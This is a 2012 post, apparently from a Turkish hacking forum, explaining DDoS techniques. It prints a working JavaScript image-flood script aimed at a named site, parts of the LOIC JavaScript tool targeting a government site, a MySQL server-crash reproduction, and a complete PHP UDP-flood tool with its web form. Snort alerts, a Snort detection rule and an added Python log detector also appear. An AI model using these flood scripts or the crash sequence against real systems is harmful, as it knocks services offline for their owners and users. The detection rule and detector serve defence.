Thursday, 28 June 2012

RE : BOTNET (MKT)

Actually, now we also need to agree on a few points. Attacks are not carried out only with botnets. As you know, the most widespread DDoS method in the world is the BOTNET: you set up your zombies with a RAT, 50-60 of them, and you DDoS. As for Anonymous, they DDoS with BOTNETs too. But it is not only botnets. Once I start writing, I write a lot. For example, there were some JS (JavaScript) + HTML + .NET-supported scripts. When you start using these scripts, it attacks as if you had entered the site and pressed ctrl+r: it loads heavily > throws traffic > the site slows down = Down, and we are left saying "WTF?!". How are these attacks done? For example, below is a JS + HTML (ctrl+r) script. We upload it as a kind of .html; it tears through the inputs in the POST and dives into the server before even being parsed, so the server weakens. This is a kind of SYN DDoS, and it works well when many people do it. But a single computer with DDoS + UDP is of no use.

Code:
<script type="text/javascript">
attack_host="www.site.ru" //down olunacak site adresi
attack_port=80
path='Shared/Compatibility.aspx'
for(i=1;i<=3000;i++)
{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' +  Math.random() + '">');}
</script>
So this is a very small script. Let me explain what it means like this:
Code:
var fireInterval;
var isFiring = false;
var currentTime = new Date()
var lastSuccess = currentTime.getTime();
var requestedCtrNode = document.getElementById("requestedCtr"),
succeededCtrNode = document.getElementById("succeededCtr"),
failedCtrNode = document.getElementById("failedCtr"),
targetURLNode = document.getElementById("targetURL")
Here, let's look at our hash tables:
Code:
var requestsHT = {};
and a sample web log:
Code:
GET /?id=1327271393334&msg=No%20A%20la%20CENSURA%20EN%20INTERNET%A1%A1%A1 HTTP/1.1" 200 8395
And the analysis:
Code:
GET /app/?id=1292337572944&msg=BOOM%2520HEADSHOT! HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Also, this DoS was found in MySQL (by ERAMONG):
Code:
mysql-test/suite/innodb/t/innodb_bug13510739.test
#
# Bug#13510739 63775: SERVER CRASH ON HANDLER READ NEXT AFTER DELETE RECORD.
#
-- source include/have_innodb.inc
CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;
INSERT INTO bug13510739 VALUES (1), (2), (3), (4);
DELETE FROM bug13510739 WHERE c=2;
HANDLER bug13510739 OPEN;
HANDLER bug13510739 READ `primary` = (2);
# this one crashes the server IF the bug IS present
HANDLER bug13510739 READ `primary` NEXT;
DROP TABLE bug13510739;
And AkaStep put it into code (test run):
Code:
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables \g
ERROR 1046 (3D000): No database selected
mysql> show databases \g
+--------------------+
| Database           |
+--------------------+
| information_schema |
| sed165             |
+--------------------+
2 rows in set (0.00 sec)

mysql> \s
--------------
mysql  Ver 14.14 Distrib 5.5.21, for Win32 (x86)

Connection id:          5
Current database:
Current user:           sed165@localhost
SSL:                    Not in use
Using delimiter:        ;
Server version:         5.5.21 MySQL Community Server (GPL)
Protocol version:       10
Connection:             localhost via TCP/IP
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
TCP port:               3306
Uptime:                 5 min 33 sec

Threads: 1  Questions: 18  Slow queries: 0  Opens: 35  Flush tables: 1  Open tables: 28  Queries per second avg: 0.054
--------------

mysql> show grants for  'sed165'@'%' \g
+-------------------------------------------------------------------------------------------------------+
| Grants for sed165@%                                                                                   |
+-------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'sed165'@'%' IDENTIFIED BY PASSWORD '*803F09BD31CC02F76D5D5C5451D00C8CDA4E9A15' |
| GRANT ALL PRIVILEGES ON `sed165`.* TO 'sed165'@'%' WITH GRANT OPTION                                  |
+-------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

mysql> use sed165 \g
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;
Query OK, 0 rows affected (0.11 sec)

mysql>
mysql> INSERT INTO bug13510739 VALUES (1), (2), (3), (4);
Query OK, 4 rows affected (0.01 sec)
Records: 4  Duplicates: 0  Warnings: 0

mysql>
mysql> DELETE FROM bug13510739 WHERE c=2;
Query OK, 1 row affected (0.05 sec)

mysql>
mysql> HANDLER bug13510739 OPEN;
Query OK, 0 rows affected (0.00 sec)

mysql>
mysql> HANDLER bug13510739 READ `primary` = (2);
Empty set (0.00 sec)

mysql>
mysql> # this one crashes the server IF the bug IS present
mysql> HANDLER bug13510739 READ `primary` NEXT;


The MySQL server crashes here. (Denial of Service)
As you can see, this exploit was found in all MySQL versions below 5.5.21. A nice VULN, so an update + backup will be needed.
Code:
# snort -c snort-test.conf -A console  -q -r /LABS2/LOIC/PCAP/LOIC-udp.pcap -O
Then:
Code:
01/27-11:58:38.849802  [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode)  - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
01/27-11:58:38.952511  [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode)  - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
01/27-11:58:39.024253  [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode)  - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
As you can see, over UDP, :80 goes down. I am talking about something like this:

So protect yourselves against DDoS. It makes a GET request:
Code:
GET  /HTTP/1.0\r\n
# snort -c snort-test.conf -A console -q -r /LABS2/LOIC/PCAP/LOIC-http.pcap -O
AND continuing the analysis over TCP:
Code:
01/27-11:57:52.977537  [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55178 -> xxx.xxx.xxx.xxx:80
01/27-11:57:54.184679  [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55188 -> xxx.xxx.xxx.xxx:80
01/27-11:57:55.111591  [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55198 -> xxx.xxx.xxx.xxx:80
LOIC JavaScript:
Code:
var requestsHT = {}; // requests hash table, may come in handy later

var makeHttpRequest = function () {
…
    var rID =Number(new Date());
        var img = new Image();
    …
    img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
    …
    requestsHT[rID] = img;
    …
}
Code:
fireButton.onclick = function () {
                if (isFiring) {
…
}

function FireIbero() {
…
}
…
document.getElementById("targetURL").value = "http://www.justice.gov";
FireIbero();
…
The MakeHTTPRequest function:
Code:
var rID =Number(new Date());
var img = new Image();
Image():
Code:
requestsHT[rID] = img;
The information the web server records about you while you are attacking:
Code:
    aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484770&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 

    aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484818&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

    aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484720&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 

    aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484936&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
Snort PCRE rule for the attack:
Code:
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Attempted DoS using JS LOIC DoS Tool"; flow: established,to_server ; pcre:”/&id=\d{13}&msg=/Uis”; threshold: type threshold, track by_src, count 400 , seconds 5 ; classtype:misc-attack; sid:1000005; rev:1;)
The msg field:
Code:
    msg=%C2%A1%C2%A1NO%20NOS%20GUSTA%20LA%20
    msg=:)
    msg=:D
    msg=Somos%20Legion!!!
    msg=Somos%20legi%C3%B3n!
    msg=Stop%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB HTTP/1.1" 200
    msg=We%20Are%20Legion!
    msg=gh
    msg=open%20megaupload
    msg=que%20sepan%20los%20nacidos%20y%20los%20que%20van%20a%20nacer %20que%20nacimos%20para%20vencer%20y%20no%20para%20ser%20vencidos
    msg=stop%20SOPA!!
    msg=We%20are%20Anonymous.%20We%20are%20Legion.%20We%20do%20not %20forgive.%20We%20do%20not%20forget.%20Expect%20us!
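As an added example (not code from the original post), the following Python script applies the same detection logic as the Snort rule above to web server log lines in the format shown earlier: it looks for the 13-digit id plus msg query shape and raises an alert when one source reaches 400 matching requests within 5 seconds. The log lines it runs on are constructed to mirror the page's sample; note that the Snort rule's pattern starts with `&id=` while the logged requests carry `?id=`, so the example accepts either separator.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Request shape the page's Snort rule targets: a 13-digit millisecond "id"
# followed by "msg". The Snort pcre anchors on "&id=" but the logged requests
# carry "?id=", so this pattern accepts either separator.
LOIC_RE = re.compile(r"[?&]id=\d{13}&msg=")

# Apache combined log: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)')

def parse_line(line):
    """Parse one access-log line; return None for lines that do not fit."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return {"src": m.group("src"), "time": ts, "request": m.group("request")}

def detect_loic(lines, count=400, seconds=5):
    """Per-source sliding window, like the rule's 'threshold, track by_src,
    count 400, seconds 5'. Returns (src, time) once per threshold hit."""
    windows = defaultdict(deque)
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not LOIC_RE.search(rec["request"]):
            continue  # unparseable or not LOIC-shaped: ignore
        q = windows[rec["src"]]
        q.append(rec["time"])
        while q and rec["time"] - q[0] > timedelta(seconds=seconds):
            q.popleft()  # drop events that fell out of the window
        if len(q) >= count:
            alerts.append((rec["src"], rec["time"]))
            q.clear()  # count the next batch afresh, as Snort's threshold does
    return alerts

def constructed_sample(n, src="aaa.bbb.ccc.ddd"):
    """Constructed log lines mirroring the page's sample (not real traffic)."""
    base = 1327572484770
    return [f'{src} - - [26/Jan/2012:11:24:05 +0200] '
            f'"GET /?id={base + i}&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 '
            f'"http://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1)"'
            for i in range(n)]

if __name__ == "__main__":
    print(detect_loic(constructed_sample(399)))  # below threshold: []
    print(detect_loic(constructed_sample(400)))  # one alert for the source
```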
++++++++++++++++++++++++++++++++++++++++++++++++++
And this is a PHP DoS script:
Code:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
 <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
 <meta name="author" content="">

 <title>PHP DoS, Coded by ***</title>
</head>
<!-- PHP DOS, coded by *** -->
<style type="text/css">
<!--
body {
 font-family: Arial, Helvetica, sans-serif;
 font-size: 12px;
 font-style: normal;
 line-height: normal;
 color: #FFFFFF;
 background-color: #000000;
}



-->
</style>
<!-- PHP DOS, coded by *** -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by *** -->
</body>
</html>
and function.php:
Code:
<?php

//=================================================
//PHP DOS v1.8 (Possibly Stronger Flood Strength)
//Coded by  ***
//www.********.tld
//=================================================

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_POST['time'];

$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;



for($i=0;$i<65535;$i++){
        $out .= "X";
}
while(1){
$packets++;
        if(time() > $max_time){
                break;
        }
        
        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>
So every kind of DDoS is possible, whether over the web or with a botnet; whether port 443 is opened or port :80 is open makes no difference, ctrl+r and tearing through the inputs in the POST are the same thing. Good luck + Thanks & Respect!! ^_^
Topic: http://www.millikuvvetler.net/showthread.php?t=8006
Peace!!!
